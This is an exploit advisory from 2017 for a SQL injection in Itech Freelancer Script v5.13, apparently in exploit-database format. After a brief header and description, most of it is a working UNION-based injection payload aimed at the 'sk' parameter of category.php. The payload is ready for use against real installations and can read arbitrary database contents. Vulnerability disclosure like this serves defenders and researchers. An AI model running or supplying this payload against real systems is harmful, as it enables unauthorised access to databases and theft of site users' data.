Exploit Title: Itech Freelancer Script v5.13 a SQL Injection Date: 30.01.2017 Vendor Homepage: http://itechscripts.com/ Software Link: http://itechscripts.com/freelancer-script/ Exploit Author: Kaan KAMIS Contact: iletisim[at]k2an[dot]com Website: http://k2an.com Category: Web Application Exploits Overview Itech Freelancer Script v5.13 is the best reverse auction script available online. Just install the product to launch your website within minutes. Please try the product now. Type of vulnerability: An SQL Injection vulnerability in Itech Freelancer Script v5.13 allows attackers to read arbitrary data from the database. Vulnerability: URL : http://localhost/category.php?sk=4[payload] Parameter: sk (GET) Type: UNION query Title: Generic UNION query (NULL) - 52 columns Payload: sk=1') UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7162787871,0x4c4d424a4d6549554b5878684e494a4464767161454a6d757a47454c697a4e4470544c46426e4765,0x71716b7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- rbbL